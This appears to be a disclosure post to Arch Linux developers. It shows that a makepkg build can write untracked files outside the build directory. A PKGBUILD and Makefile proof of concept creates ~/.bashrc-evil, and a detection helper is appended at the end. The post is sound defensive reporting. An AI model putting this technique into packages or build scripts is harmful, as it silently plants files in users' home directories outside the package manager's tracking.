Greetings,

I've come across unexpected behavior in makepkg. One of several possible outcomes of this quirk is the ability to create files outside of the build environment. They are not included in the package, so the package manager is unaware of them. Moreover, only the build process is affected; installation is not a factor. In this manner, these untracked files can propagate to directories with write access by the user.

It's unclear if this is a limitation of fakeroot or makepkg but I will continue to investigate. Here is a simple demonstration of this exploit.

========== Makefile ==========
install:
	@wall creating ${HOME}/.bashrc-evil
	@touch ${HOME}/.bashrc-evil

========== PKGBUILD ===========
pkgname=hello-world
pkgver=0.1
pkgrel=1
pkgdesc="Friendly package"
arch=('any')
source=('Makefile')
md5sums=(SKIP)

build() {
  cd "$srcdir"
  make
}

package() {
  cd "$srcdir"
  make DESTDIR="${pkgdir}" install
}

================
$ makepkg
==> Making package: hello-world 0.1-1 (Fri Sep 4 15:08:04 GMT 2015)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
  -> Found Makefile
==> Validating source files with md5sums...
    Makefile ... Skipped
==> Extracting sources...
==> Removing existing $pkgdir/ directory...
==> Starting build()...

Broadcast message from hazard@archlinux (pts/4) (Fri Sep 4 15:08:04 2015):

creating /home/hazard/.bashrc-evil

==> Entering fakeroot environment...
==> Starting package()...
ERROR: ld.so: object 'libfakeroot.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.

Broadcast message from hazard@archlinux (pts/4) (Fri Sep 4 15:08:05 2015):

creating /home/hazard/.bashrc-evil

==> Tidying install...
  -> Purging unwanted files...
  -> Compressing man and info pages...
  -> Stripping unneeded symbols from binaries and libraries...
==> Creating package "hello-world"...
  -> Generating .PKGINFO file...
  -> Generating .MTREE file...
  -> Compressing package...
==> Leaving fakeroot environment.
==> Finished making: hello-world 0.1-1 (Fri Sep 4 15:08:05 GMT 2015)

$ tar -tf hello-world-0.1-1-any.pkg.tar.xz
.PKGINFO
.MTREE

$ ls ~/.bashrc-evil
/home/hazard/.bashrc-evil

$ pacman -Qo ~/.bashrc-evil
error: No package owns /home/hazard/.bashrc-evil
==================

It should be noted that I only caught this because makepkg failed to build a certain package due to a lack of write access to the home directory (apacman AUR wrapper uses a restricted user to build).

There was that controversial change back in pacman 4.2 to prevent makepkg running as root. I propose that makepkg should not run as the current user either but instead a dedicated unprivileged user.

See here for more info: github.com/oshazard/apacman/issues/23

Sincerely,
hazard (Archlinux BBS and AUR)

P.S. apologies if this is a dupe, last message was rejected
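
One way to catch the behaviour reported above is to run the build under a wrapper that lists every file created or modified under a watched directory (such as the build user's home) but outside the build directory. This is an added example, not part of the original message and not code from makepkg or apacman; the function name audit_build and its arguments are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original message): audit_build is a hypothetical
# helper that runs one build command and lists every non-directory path that
# was created or modified under WATCH_DIR but outside BUILD_DIR.
#
# usage: audit_build WATCH_DIR BUILD_DIR CMD [ARGS...]
# returns 0 when nothing escaped, 1 when something did, 2 on setup errors.
audit_build() {
    if [ "$#" -lt 3 ]; then
        echo "usage: audit_build WATCH_DIR BUILD_DIR CMD [ARGS...]" >&2
        return 2
    fi
    watch_dir=$1
    build_dir=$2
    shift 2

    # Reference timestamp: anything with a later mtime was touched by the build.
    stamp=$(mktemp) || return 2
    # Wait so that files written right away get a strictly newer mtime, even
    # on filesystems with coarse timestamps.
    sleep 1

    # Send the build's own output to stderr so stdout carries only the report.
    build_rc=0
    "$@" >&2 || build_rc=$?
    [ "$build_rc" -eq 0 ] || echo "build command exited with $build_rc" >&2

    # Prune the build directory, then report everything else newer than the stamp.
    escaped=$(find "$watch_dir" -path "$build_dir" -prune -o \
                   ! -type d -newer "$stamp" -print 2>/dev/null)
    rm -f "$stamp"

    if [ -n "$escaped" ]; then
        printf '%s\n' "$escaped"
        return 1
    fi
    return 0
}

# Typical call (assumption: run from the directory holding the PKGBUILD):
#   audit_build "$HOME" "$PWD" makepkg
```

The check relies on modification times, so a build step that resets mtimes on the files it writes would not be reported.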